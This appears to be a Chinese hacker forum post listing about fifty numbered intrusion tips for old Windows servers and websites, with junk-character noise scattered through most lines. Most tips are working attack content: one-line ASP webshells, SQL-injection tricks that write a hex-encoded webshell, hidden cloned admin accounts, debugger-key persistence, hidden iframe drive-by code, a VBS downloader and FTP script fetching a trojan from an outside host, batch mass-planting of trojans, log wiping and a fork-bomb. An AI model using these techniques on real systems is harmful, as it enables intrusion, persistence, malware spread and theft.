Xp系统修改权限防止病毒或木马等破坏系统,cmd下,6 G0 N0 I1 [6 p) f6 y1 b
cacls C:\windows\system32 /G hqw20:R
8 T; @: S# R, O思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
j3 p, @* @# ]/ s恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
2 K) d% @% H/ |: y* A* M- @8 O& U/ I
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。! f4 Q$ e) w6 m6 w/ `; G
6 F3 h5 F/ x! J, _# l1 J. }& G
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
_* ^) h+ O. n0 D, D5 u5 \6 [% ~" J, B0 ?
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
1 t# ?* t& r+ p$ n4 u; b
4 e: N, H* O9 ^0 x5、利用INF文件来修改注册表
2 L; Z$ k% s+ \" S q[Version]6 {8 l& q/ o% o( o- B: p
Signature="$CHICAGO$"
! e8 S$ Q' ]# W, l L, {' s1 l[Defaultinstall]
( E7 F) t: c9 v) F. x3 PaddREG=Ating1 q, Q5 e% _* u- B: X% b% V# N: ~; D
[Ating]
& O1 k5 v# H2 z/ J" J4 M$ SHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"* v! g3 W- A6 F4 K; X
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:+ i4 _) v+ j3 z/ q
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
+ l6 ^& \3 z) F6 N+ g8 J其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
$ ?4 ?' k0 Q0 ^8 T: aHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU( {0 ]6 k: q/ l+ E
HKEY_CURRENT_CONFIG 简写为 HKCC
" v" u0 P V u; r2 Z. Y0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值+ [+ Z" C' R! k+ L" D' u
"1"这里代表是写入或删除注册表键值中的具体数据
" H. m" R' L4 ]9 X( r" R$ C( n8 u
. i5 h* c. B9 b' C g# v% S+ V6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,6 b. \+ M9 t1 g1 y
多了一步就是在防火墙里添加个端口,然后导出其键值
7 [6 c0 k7 n3 K/ R# {6 S[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]+ U7 {3 a s' m3 D- ^, J- M5 _, V
2 J- y. ?+ H" m* Z' S% M# D
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ L) G! O( X' V3 P" Y; X' W0 F
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。) M) q/ s$ n @8 J. V
2 \- h/ ~. m7 C! Z
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
3 [( u5 I& ?. s. A+ ^+ g/ s
5 o6 R) x: J3 N9 Q% \' o9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,! S" F; G( P" Y% K) ^
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。1 m. b) o; D# q! T
h4 c& h4 W0 r/ s& q" [( f! Z3 S( E10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
4 \; S. b" d' y0 V" P# L% U& h
5 S# r; F- I# }- T9 C7 v11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
+ H7 \! g+ E8 Q用法:xsniff –pass –hide –log pass.txt/ p6 w( ] e {( a6 }/ Z
3 ]! c" {6 h* x, A12、google搜索的艺术
! E) e4 Q" m/ l搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”# G2 |8 Y# ]9 Y! W! N
或“字符串的语法错误”可以找到很多sql注入漏洞。
$ \8 ~) ^+ t" J6 y5 m, k" v8 `, n2 q; p+ i2 B; z, q9 g
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。$ l3 ]# h: B0 g$ [' ~6 p* x# T
% ^3 M- O* W% d- G+ n& ~
14、cmd中输入 nc –vv –l –p 1987
, N& B- |# @* Y" V- G) ?做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃2 r8 C: A+ `! w$ L
6 a( C- a/ n& C/ d15、制作T++木马,先写个ating.hta文件,内容为; g: v9 f5 F& \
<script language="VBScript">
0 j4 j+ f. X5 j$ Y) Q1 R- vset wshshell=createobject ("wscript.shell" )
6 I9 }! W, @ l7 v) ~4 Ia=wshshell.run("你马的名称",1)
5 |3 {' ]# n5 z" ^9 Bwindow.close
# `& z9 v. V- M* y: ^/ A m2 N</script>
: w5 X" q" \ `3 X) Q$ g) i再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
0 x8 i% i8 c+ Q% v, \% ?4 v, G- H, P6 {
16、搜索栏里输入
' v, n w% ]- `6 q0 V0 M关键字%'and 1=1 and '%'=') f! _/ V- Z, [; L. e! W' _
关键字%'and 1=2 and '%'='/ {9 i# ~1 p* ^, I4 n5 ~. h5 D
比较不同处 可以作为注入的特征字符( J8 V2 B2 ^% A, f$ r4 L0 S
+ b& ^6 V" K' I5 O17、挂马代码<html>
4 J1 F/ v- F+ I2 D! }<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
- y) j2 I/ w: A, D</html>+ m( Q1 S) y4 [ x
( A `; U* |* U18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
2 U$ V, p: l( c- A! Onet localgroup administrators还是可以看出Guest是管理员来。! b/ J. u& m8 O6 q+ Y$ a
4 C, ?: ^9 z" j0 @) i) A
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
! ]5 [9 N- k# Y% V9 G用法: 安装: instsrv.exe 服务名称 路径
, G9 q1 _# s; Q卸载: instsrv.exe 服务名称 REMOVE1 A1 F; Y! T' z# v8 R9 ?+ ]9 g
9 k( \- m$ f% ^4 H! M9 O0 p: s) M
1 e8 S8 n5 e( u
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 n1 k3 x- s( @不能注入时要第一时间想到%5c暴库。
" s; p+ R/ l$ a( f+ d) T/ D
& Y8 `" P, U7 ^8 i7 L* }% g( P; ?22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~: i5 U3 R0 L; I) x% f: X
+ x, T$ j' C9 L3 a$ ~" A23、缺少xp_cmdshell时
2 f% V) }6 P- `) R尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'0 I9 X6 H3 S0 R
假如恢复不成功,可以尝试直接加用户(针对开3389的)$ Q2 w7 \/ X5 ~0 x: R, `, D5 c
declare @o int
1 g0 f$ `: u" [4 V4 c/ ^. r+ rexec sp_oacreate 'wscript.shell',@o out8 S# ]$ s( Q, o/ R
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员/ o: S/ g/ o1 J# A3 N
+ p8 b* j" R) I24.批量种植木马.bat4 O( |! L- W0 H
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
0 d2 T% f. g+ Wfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间+ O) H% }! j5 a
扫描地址.txt里每个主机名一行 用\\开头4 J( [0 Z7 E1 f& D) n$ R9 L% Y
3 j W( _" y: w4 p25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
1 E' ]6 X- Q, v, Y2 b. D# F. ]* `# [9 f: x0 ?- D6 @+ b
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
9 |" E" p& ?! h& G9 x# L将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.6 B. l8 j1 ~1 Z& a* X: b
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
5 q: F3 j+ q" E0 }& T6 o: t% b" H; q; d1 ?8 L5 O. M% q% B
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
6 J B1 X& H4 ^( W然后用#clear logg和#clear line vty *删除日志
2 g" H& p& u" D' y h5 m
( H3 g/ c# W0 w$ f" s B28、电脑坏了省去重新安装系统的方法$ K" q1 I% G! n2 r3 ~' h
纯dos下执行,! B+ }. U; g4 ]
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
- \4 i& |2 K9 e; ?- W6 D6 |2 \2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config* ^* r+ T6 n, e6 E9 Y/ g, g. Y
1 Y' `6 o9 x$ {2 A$ C P: w' A29、解决TCP/IP筛选 在注册表里有三处,分别是:0 {' L# g9 P- x8 v/ G" @* U
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
. T* x, _) ]# h }1 P9 G( LHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip) ?1 H# W* a g8 y4 s
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 E, g( d2 A2 a& r7 C7 D% W2 T分别用# B, |( ]- j4 h+ G
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% y+ y U# U8 p
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
: `, ~; `3 ?+ G2 ^regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( n' v% s: L' ]1 s3 y; v命令来导出注册表项 L* D6 V# L6 @3 \
然后把三个文件里的EnableSecurityFilters"=dword:00000001,7 |, B" x3 ^" m& w- M/ D
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用( p9 G6 g3 ]4 u- ?3 l9 K# c* v* R0 }* I
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。; j0 W& ~8 N# p% r: g$ K2 v) S
; v6 m) j+ H5 e4 G8 s30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U) Y% U! P9 S" E
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
" W2 W2 O" }3 {# Z, [7 K( ^
' k$ a) t$ }1 A2 y4 N2 O31、全手工打造开3389工具2 d' v2 ?2 F" R
打开记事本,编辑内容如下:
" F U* n: i1 h/ G! }9 Techo [Components] > c:\sql% t/ N% N& } P$ V- w
echo TSEnable = on >> c:\sql
5 ~( E3 g) O8 ?/ \6 usysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q1 B9 s) q" i+ _2 O! N
编辑好后存为BAT文件,上传至肉鸡,执行
0 p1 e& h' @7 e3 G t# k3 |2 B2 K; S
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马 G2 w" X' V4 x% s
: y1 p9 T1 ~: b/ y) f33、让服务器重启5 u( \3 h n: t* P& O2 }
写个bat死循环:% H4 z5 F- I6 S' ~
@echo off0 c, a, x* \, v0 w
:loop1
1 O$ W' l/ r1 V' D3 F. {5 S# |) U% Dcls
1 M. S. j. u0 V7 _2 gstart cmd.exe% b) b2 s$ i( M* y) ^8 S
goto loop17 J- i. ~6 z; t; {2 {' Z/ V
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启) h3 C' O h: l
' C3 V4 B% H0 \, N
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
" O" A% A/ J( K, g3 {@echo off
, p6 W. z6 N0 {, f/ Fdate /t >c:/3389.txt
! r7 i% B; r$ ?4 qtime /t >>c:/3389.txt
+ _. \" _9 N! _% o: x/ M# pattrib +s +h c:/3389.bat( E6 w9 r3 L6 ]# ` G8 n
attrib +s +h c:/3389.txt
, ?* K4 l/ r7 O& x; s4 ]6 nnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt7 Q, N5 Z$ A: P8 H C
并保存为3389.bat' p6 m0 B$ r- `3 l2 C: i! k- d3 O
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
$ T6 X% m) v. n( W( N- U
! z9 t7 L& e% J) ?35、有时候提不了权限的话,试试这个命令,在命令行里输入:
( H% G, o+ h' A! n: W5 H" L, b$ e* O* p0 _start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页) H; t6 w( \; }0 V
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
3 v; T$ D8 i; F: n: L3 Z
7 l$ b. c$ ] z# _( C$ Y36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件+ i$ @% [% M# Y Y, a
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
8 g' H+ N5 |/ o M% P% C2 Decho 你的FTP账号 >>c:\1.bat //输入账号
) H* `9 u3 `- yecho 你的FTP密码 >>c:\1.bat //输入密码) C4 I7 k3 e, ^7 {8 @
echo bin >>c:\1.bat //登入: ^+ x; L1 e& r+ r. K
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
7 I/ u9 l1 c: ~, O$ k8 yecho bye >>c:\1.bat //退出( w8 y; f# N! e) P# r0 P
然后执行ftp -s:c:\1.bat即可
% ~6 B7 F5 ?5 \/ W8 T# y! W0 | Q& R! ]) |
37、修改注册表开3389两法
! b$ w d3 i& I9 ^# F3 A(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表% @5 [2 x& E& W- \0 A
echo Windows Registry Editor Version 5.00 >>3389.reg& u3 _6 y3 ~9 d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg6 b+ T& Y- B( X( E
echo "Enabled"="0" >>3389.reg' ^7 A% K& x$ f: w& D ?$ P7 b
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
( ^4 u+ [* Q) p# t! Z0 ZNT\CurrentVersion\Winlogon] >>3389.reg
) k: h" \: @ t% pecho "ShutdownWithoutLogon"="0" >>3389.reg* q& V5 h3 e" M% i' t/ @2 ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]# d. A0 d* b% Z% E' W
>>3389.reg7 f6 W: N# O; N' r! W& }8 G
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg) t0 Z, s, [% L+ h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
1 T! \1 Y+ T+ w>>3389.reg# g" C- z$ [( i" z. v, g; U( C
echo "TSEnabled"=dword:00000001 >>3389.reg. ~" M5 Y& v1 Q3 e6 t2 e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg; Z" f- f1 G7 l" [. l
echo "Start"=dword:00000002 >>3389.reg+ A' P4 s) h: X3 g' B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
9 I1 f+ B7 A" B+ }6 c$ M1 `4 M& i>>3389.reg6 ~4 ~+ B! J8 q" O
echo "Start"=dword:00000002 >>3389.reg* M9 k8 D5 v% A5 N
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg/ H; v5 V0 |7 u3 ?. v/ G) g
echo "Hotkey"="1" >>3389.reg
. Q6 X m# W' T! a9 \( i; kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ @' L$ \( a; {3 Q( }- P* T( r
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
, K8 e' c( s2 {echo "PortNumber"=dword:00000D3D >>3389.reg( E& b- w3 b. e2 t' O* p0 K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 E$ M) \$ N* C# R6 E9 a/ l, yServer\WinStations\RDP-Tcp] >>3389.reg
6 u. O: _' m6 ^echo "PortNumber"=dword:00000D3D >>3389.reg# |: |. g: t, f" E6 j& R
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。2 Z2 W- X" C. X) t
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
; {* w1 U( U$ H- E, ]8 R! q因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
4 l/ l$ R8 x* y9 K* d8 P(2)winxp和win2003终端开启
" Y- ?8 |+ U2 }" t6 V; |用以下ECHO代码写一个REG文件:
: L8 b3 I; ^' c, hecho Windows Registry Editor Version 5.00>>3389.reg
0 Z) f3 Z! B/ [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% m: q' R1 a' C: _
Server]>>3389.reg
! w( z* m2 f- K" Q9 O' vecho "fDenyTSConnections"=dword:00000000>>3389.reg9 X# G0 {6 R: l9 ?6 w9 {2 n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; ?% ~4 W& q3 v6 h E3 o% CServer\Wds\rdpwd\Tds\tcp]>>3389.reg
# H& d9 ]% E1 L; R% techo "PortNumber"=dword:00000d3d>>3389.reg
2 G1 C' B3 L) [8 \% q: }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% F! k- j1 S/ y) q7 f3 aServer\WinStations\RDP-Tcp]>>3389.reg1 E) \: m, f6 k% d2 b0 c |
echo "PortNumber"=dword:00000d3d>>3389.reg- S7 \) A0 [, U& M
然后regedit /s 3389.reg del 3389.reg& }9 N1 C" T# c
XP下不论开终端还是改终端端口都不需重启% ?( Q* }; q7 H- ?
* \, N$ [' c$ F6 d: ]* L
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
. ^5 ~. G2 A' I9 l' g( F用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
9 ~# E2 N4 C+ l: O6 L. a1 E' b$ O8 W% i0 H" C% N& d
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!3 B1 y0 L) A6 h# K, O( G* Z* O
(1)数据库文件名应复杂并要有特殊字符
3 [& @6 d( _" V: R n(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
6 Q9 A+ V! v: M$ m将conn.asp文档中的
) s0 o) V; k$ ], D) HDBPath = Server.MapPath("数据库.mdb")( [7 q) u: ~& G2 H* P- _! V
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
d; E& V! d& b. [
1 h+ E- P8 `+ Y修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置0 `/ x) V# Y8 M- _
(3)不放在WEB目录里4 x6 D' s# t5 X0 ?8 S
" F. ?9 |$ Y* Q, C% E2 w" c
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
* G; k) a9 C( Y2 b6 `& N; B可以写两个bat文件) p/ F' `9 e- D9 |8 ~
@echo off
" ?, h$ }( G, Q1 I& w@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
3 @( o$ n/ t9 c# b m0 S@del c:\winnt\system32\query.exe
$ e$ h+ y. y7 o: B1 S8 r5 A@del %SYSTEMROOT%\system32\dllcache\query.exe
. V" e. x/ R, v5 d' j@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的" `3 S) U. m- o* a7 `3 j. v+ s
# _ H+ [7 F/ q, t: ^; S1 Q2 Z+ T
@echo off
2 z6 k+ V8 z' G9 q@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
+ z+ i$ z2 l6 j$ }( H' ~0 `@del c:\winnt\system32\tsadmin.exe
6 Y" g& b+ k) e b! t; K: ?( ~@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
, K% j0 b: e# ~2 T' _% k) I; k$ Z; z
41、映射对方盘符
9 ^- |, U' f; d) _3 [$ [telnet到他的机器上,' W1 g: q% L, M% A! t! N% L. Z J2 A
net share 查看有没有默认共享 如果没有,那么就接着运行
2 [: ]4 C4 c4 v2 b; S" Znet share c$=c:
( N+ S( e& k0 L0 v% P' E" X/ Xnet share现在有c$
- Q! S+ w' I; M1 p G( [* b6 W: z在自己的机器上运行7 z: C: ~% ^- y
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
$ h& o! v4 k2 S' U7 G0 R$ [- i/ T# X* M2 S- k. @ r5 W8 l! L" U
42、一些很有用的老知识) Y8 Z& G0 S1 V9 m) S
type c:\boot.ini ( 查看系统版本 ). o% |8 h: m6 q/ |) u$ _
net start (查看已经启动的服务)
: a- d: T! E2 ], L7 O) L; |; l. Qquery user ( 查看当前终端连接 )6 a; {+ r R* r: c5 g
net user ( 查看当前用户 )
; Q" i: l# Z3 [, J+ m1 Onet user 用户 密码/add ( 建立账号 )
) K' ~* @! k& Rnet localgroup administrators 用户 /add (提升某用户为管理员)# y, R( J$ H) r! Q. F0 r" Z
ipconfig -all ( 查看IP什么的 )
/ ]' M: R# p5 f( {& Inetstat -an ( 查看当前网络状态 ); W+ Z1 M" i$ W2 A& ~5 L
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
1 N: }. H0 j/ L" A P! T克隆时Administrator对应1F45 G: G# G1 L: C- x* o/ y- `6 j& Z
guest对应1F5
. X B4 J) [0 |tsinternetuser对应3E8
8 f7 r% D2 f5 k- J. h3 d4 V" o
" Y% k+ o- N" E$ B; L43、如果对方没开3389,但是装了Remote Administrator Service
- B1 k7 r! e: G3 b6 x0 j用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接" J+ ~1 l `2 G
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息1 ?- b4 G7 U3 y6 I9 Y
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"' O0 k, q$ z1 b
. z4 Y6 s: C* v9 \2 Z9 B* y Z44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
) `4 G2 A4 W, O- h# {本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
7 @5 h5 c r9 y6 A/ I$ s
: J" S- M; M5 Z- A% a' Y: g, J* d$ t45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)" c) m9 }1 Z4 ~: H. K# w6 _* D4 o
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open# \+ G ~$ ]% D. E
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =/ s, v# w$ R1 ] M1 D
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =+ G6 K) E) _* I; v/ O8 x
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
6 O4 X3 [" a$ ^2 F% {7 T: I7 g2 I(这是完整的一句话,其中没有换行符)
5 W' r) _# v \然后下载:' q: [1 m3 a, m: C) [- L7 O
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
/ @ J5 f& L) n; Z* Q$ |
% h2 G. h' ^& \7 e" l% m( b1 Y' ~46、一句话木马成功依赖于两个条件:
2 [! f: f! U4 {8 m# P- w4 k1、服务端没有禁止adodb.Stream或FSO组件
9 `$ h6 }2 A) x. t v. k8 e2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。; U0 `, e; q2 u3 ^: D$ L) b
% V7 K/ L* f2 B9 n; A47、利用DB_OWNER权限进行手工备份一句话木马的代码:( m- j& R$ k C6 H
;alter database utsz set RECOVERY FULL-- {5 p8 ^. ~9 X( b
;create table cmd (a image)--% W- N6 X' C: z: }7 |6 A
;backup log utsz to disk = 'D:\cmd' with init--
1 Q# s \( d! z( z. s$ U/ t. `;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--; m- _2 J+ I. c9 G: r% n0 L" i- H9 C
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
. V9 l5 B$ ]) p% P注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
3 B) M, ?- m3 r
4 D2 p1 ~: K* N- T, O9 {48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:4 ?0 U3 m: U' f( Z. E% w( i
: s1 ]$ r! y4 l/ A! q$ ?8 ?
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
' E+ ]! C4 Z5 M- O6 ^所有会话用 'all'。" U0 J$ _0 C* v) @$ h
-s sessionid 列出会话的信息。2 d% Z2 i) h9 X' y5 I7 | p$ f( g
-k sessionid 终止会话。' o& b4 [: |: A% s9 X, \+ B6 z$ x
-m sessionid 发送消息到会话。1 Z0 ~& \: z3 r2 n4 o8 N
( Q' A* L8 r U, mconfig 配置 telnet 服务器参数。2 C% C" y5 L" K; i9 U% x
9 j% [( y# _' b- M: j( J; `common_options 为:
9 R5 }% j. u6 @8 j* F-u user 指定要使用其凭据的用户
3 T$ x0 x! k. H f$ Q, X-p password 用户密码
+ r5 u: I# [+ G8 D3 e) Z
4 x8 W" r/ x/ q7 u8 |config_options 为:
: v3 G: y8 R/ M! ]dom = domain 设定用户的默认域
$ P" y2 w8 d' ]3 A$ g- Octrlakeymap = yes|no 设定 ALT 键的映射6 x, B& j4 Y/ [8 a3 `3 p4 S9 v7 P+ i
timeout = hh:mm:ss 设定空闲会话超时值
; I& g; G ~. [/ r' Jtimeoutactive = yes|no 启用空闲会话。
! h- ^) [0 r. c7 }$ u5 w8 cmaxfail = attempts 设定断开前失败的登录企图数。
9 `) j8 t) l3 hmaxconn = connections 设定最大连接数。
- f4 J* W- i6 v: q uport = number 设定 telnet 端口。1 E8 S5 C; [! [
sec = [+/-]NTLM [+/-]passwd
" w9 b- ]. V7 m/ A* s设定身份验证机构
$ { f" s% z R. Y( Ifname = file 指定审计文件名。+ @1 {9 V. |; Y2 t
fsize = size 指定审计文件的最大尺寸(MB)。
/ x8 {0 }/ M! {" `( Y" Amode = console|stream 指定操作模式。
N1 J6 i5 }- T4 w1 }auditlocation = eventlog|file|both
7 F1 l! u, ?6 C/ j& w2 Z! i指定记录地点
/ p% r6 m8 ^. s/ _( paudit = [+/-]user [+/-]fail [+/-]admin
! }3 n6 a) Y" d* ^3 k
+ y. ^% `. c' k, D& V49、例如:在IE上访问:. `! u: L' l! h% |6 ?
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/& C- m. J9 N' b: i9 o# J
hack.txt里面的代码是:: {! X$ e1 X- E. s3 E, Z" l
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">6 d2 o# f" \+ b7 b
把这个hack.txt发到你空间就可以了!
2 ^, t k2 [6 h. c这个可以利用来做网马哦!
7 u% |. @) F( s H1 u* S, h' `
; Q2 {$ k/ W% c" s. \; |0 {$ r50、autorun的病毒可以通过手动限制!2 k' f; q6 L/ X8 X' L4 D
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
9 y9 Z6 L0 a6 s x( d6 ^8 R2,打开盘符用右键打开!切忌双击盘符~
# L2 n) e4 |6 b* Q8 Q$ d3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!3 K" g B( O1 X
: S, q1 h: y2 C* E! n9 ^
51、log备份时的一句话木马:$ y! w. m& v e8 O# [$ S
a).<%%25Execute(request("go"))%%25>. P+ v% Q3 l3 J2 J
b).<%Execute(request("go"))%>
1 c& N! ~) D; K% K% |) Wc).%><%execute request("go")%><%
* _2 _+ `6 m2 {( X6 kd).<script language=VBScript runat=server>execute request("sb")</Script>
2 \ M- v9 U n: Re).<%25Execute(request("l"))%25>
/ Z! w! C& Z: g9 B/ u) R s! Q8 qf).<%if request("cmd")<>"" then execute request("pass")%>
: j1 u1 \+ m0 a9 y
9 }& K( S( ^% ]) _5 ]% O' U2 W52、at "12:17" /interactive cmd) P. Y0 x9 N6 ]" K7 G( c- Y
执行后可以用AT命令查看新加的任务
8 ~: K; {0 o6 C( i用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。$ s# T) q( A5 ~& q7 d# X# x
1 V2 }+ A0 ?+ O8 U) v2 X4 b
